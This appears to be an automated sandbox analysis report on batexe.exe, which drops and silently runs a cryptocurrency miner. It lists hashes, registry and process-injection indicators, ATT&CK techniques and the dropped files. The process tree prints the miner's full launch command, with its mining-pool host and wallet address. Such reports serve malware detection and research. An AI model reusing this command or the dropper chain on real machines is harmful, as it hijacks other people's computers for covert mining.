73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 03:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1414748551-1520717498-2956787782-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5336	b2e.exe
3836	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3836	cpuminer-sse2.exe
3836	cpuminer-sse2.exe
3836	cpuminer-sse2.exe
3836	cpuminer-sse2.exe
3836	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4000-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4000 wrote to memory of 5336	4000	batexe.exe	86
PID 4000 wrote to memory of 5336	4000	batexe.exe	86
PID 4000 wrote to memory of 5336	4000	batexe.exe	86
PID 5336 wrote to memory of 4148	5336	b2e.exe	87
PID 5336 wrote to memory of 4148	5336	b2e.exe	87
PID 5336 wrote to memory of 4148	5336	b2e.exe	87
PID 4148 wrote to memory of 3836	4148	cmd.exe	90
PID 4148 wrote to memory of 3836	4148	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4000
- C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AC0F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe

Filesize
371KB

MD5
7b9fdfb947fd4f44545569c05c9ba285

SHA1
94db7136fc1d16cc1ef36247541489498fa212f6

SHA256
4237b665775ddcfad481f946dc3ccd30e828d21bd45e940dc3877445e16b97a2

SHA512
f32e364779dd385b11c98051d5325f3a72c491bd2c36fc69b738215a6c4446bfea35bed03966f89d27d83abc3241bafde08cc94fa091e7d58367a874adb90ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe

Filesize
839KB

MD5
f5440110abcc443c2e3e09d681e8ba42

SHA1
5c8b3ea4efa727396e06035a957397bd86a8d381

SHA256
25e1809aa275a4f1ce5deb0429e99e06ad38af5d1eb5485f3de6492cc6b2cb91

SHA512
9a9a6f88991890865aa2980b7ead62e19ece583a6dd37951cfb1e8b59db9b051a12e92cfcc88a5aee46dd4588d6769dd459ccde6cfacfecfe1d58c94d1ecb4e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\A5F4.tmp\b2e.exe

Filesize
718KB

MD5
e311bcc67c620779759f530b8012120e

SHA1
f9a064358794dabbcdb6b7f1752655e751563191

SHA256
6b86f73f896491db5ad2f0e8ff8cfb734771d061165f8ea59dd033ab3ffb16cd

SHA512
df15f9be00fe28f81e2f8205c781c1ab7f2678e705c5b98e4f0501c0d5f7869ee726e044b7255c754a7bc87ddab5591dea3fe9e8744da1b927383df74adb12db

Download Submit
C:\Users\Admin\AppData\Local\Temp\AC0F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
334KB

MD5
b76d96efa8097e88e118be130628f593

SHA1
710c730be4178b19182a0ed7f4966dfcd8ef8309

SHA256
578d7beba92e1bc7b6d7d47c0e74b822f89774a4eb72860732b83051ad29fe49

SHA512
2978f0e7e48ad3ce8d75778d01b63ef1b0637ab78b4996bf8bd90cf4c5f95afdb6b0fcad8f0fd4d61a89f9993dde409ae0b7f81a1806dc43f86dd61d959265d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
419KB

MD5
d8ac2a509679a057efdab809edf7e324

SHA1
ef260905844f243e57452ac2e9f4b63a89385c77

SHA256
7f6c17810715784f4eb5903b040a5a97036390fd1c56df26a49b29d74fa45915

SHA512
a38c69546593bb03b8d2b45a7f652a7b4ed4a9e12c7b46bb27ebab0aebac44e7b6324a7bb3aa16063d8573b3e52857ce6541794a192e3a0a2ac51daf8e07de2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
1KB

MD5
d27bb4786bd7510db4a0a909181e1253

SHA1
ee39176b6998f20d072ed95b88e0e9e5c0476abe

SHA256
f82b8ec71b49c257046f0f7f09b026eb9a4a8879d2125cb3a5fe8722de2c8740

SHA512
9dc4bf61c7b5fb76a33ccb2fed698b9509dca2584b7b265724535f93c1a9c06eb5547e7575b0c4ec05c804c0fb104dd4ccc4bc59a932dd05840d971b45258fa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
486KB

MD5
1ced7856c911180b4649e6a52e307470

SHA1
5db1793a94f6aa17fccb2aa91412f4553929911e

SHA256
20ed2195824b86091f962f5c6204681124a0c13ed9b7151421d7348afad336b5

SHA512
6fe34627e08d83dac4af8d0881ef10a582a8070811a6e93efa56f74e852fe4d0356fb3cdecca3a65762db025f146776baaec2240d530d7767b671cb46923f000

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
5945d1ec259107a5e8e215087bcd4cdf

SHA1
ac7f4923f2b622da53be30ee67bd6d8e2ef5e164

SHA256
15a5f7acb2f482346127a5794b4193bdb151dcd19e884527d8637a6c260734cf

SHA512
6e4c8645bb60aad0ca56d0f70b4ea51901739f400a7f7f235d32aba467342ec8223252ca640aa71d69698606f6e4025f78d7fb24aa9beeaa8117444466886fc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
416KB

MD5
b66253c1ef8bc81d0679c2c4d43d6824

SHA1
788d4af7424bf8ba6443bcb892e5b6669e8901e2

SHA256
d30a4f73dc68a762a466c25141fbf060c88b5024ebe10d5ddd782a08c19af89d

SHA512
354c656c3e042589644fa54cc3f55045c051b8e7fd19b5b8bc3f8744a28b89f186470f7d2e80efe95cd0ee90fec40840d89617ab93cef1183e2f9a84c64c3bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
452KB

MD5
fed1fa411ca06f7baf8119528681d327

SHA1
36b54c0b809c7134325e49dc72016e580aba381a

SHA256
8b6e474fc237aa774762270dee63aa737bc5e38e49a8f3b9523b88d9f6d56641

SHA512
0c45d91209859bf5564745300917bb8cab929cc2ab272f45d9be1b002dc4fe5f01465fd3bc56e052103f5c6bea8e9d87379cc80515f197dcf1a5a671105c9b8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
351KB

MD5
ec0fe28ea097eb64a4ba5e31a1783d5f

SHA1
91d62659d66cc99136e1a7ae1a1f8808cc2b49f9

SHA256
a944e7a4cdff2867a1518cbbed6a394c090164692618b59435d24a621165e10e

SHA512
a4d7d0ed73830f4baf0e5077c95e47b753969e30a889266a5c2e7bf5eef844adc5ba820ac93eed25379da788868bf7770bf0e5ff36b229626a6cafa3eb5e710d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
350KB

MD5
41555b447e80977d44ad377775eb5c7d

SHA1
3d824544b72eab893e7554f8d5bdeb8cc2d9c3ac

SHA256
7f26b948d603db66713c269e73469139c79ca061127dfc0e3683ee98d88023e4

SHA512
1b08c12267fd6a500d0dbc910ec781188fbcf50bb31d7e6667ac8bc5eb6b23c74dfbbbf4cc5f3b913f5df3b9b2994e90bfd4dbc4530ffcfa4128441a31ab9bdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
372KB

MD5
bd1b1cf92f1483a13602bb30e016d917

SHA1
0293e2da884686855090bd2c7cc3304da67a9ca3

SHA256
5b0ddb2b17c810f89c0628e34c048be5413261e9ea8bb7477f8e13da21bd17a2

SHA512
1dbd88fd2a5d72a9f2422f420c8bb5307a6b7591c40dd734d5df2ac80aa24517a9f4e6290079448eddaa89965708f9a78a6c90c5d08692e72a632cb5f11ca252

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
525KB

MD5
0b8bae17daace98964bfb397c344989c

SHA1
6c9c4ca02dfe29e1e6e6e75cc1a9d21700e4cb4b

SHA256
baa4d3841eff8796fa0af684adfa7b2042dcbab4e3520e5472086fe1dad33d6b

SHA512
b79465158d59cf198baa354206b86ac3428a64c8000408ae871a8b68c219990f07a7bec3b818e84ab403cab92c8784f9fc9eab5e55bd3d3f1ce42fc7804929c8

Download Submit
memory/3836-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3836-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3836-45-0x0000000055A20000-0x0000000055AB8000-memory.dmp

Filesize
608KB

Download
memory/3836-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-47-0x0000000001140000-0x00000000029F5000-memory.dmp

Filesize
24.7MB

Download
memory/3836-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3836-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4000-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5336-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5336-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download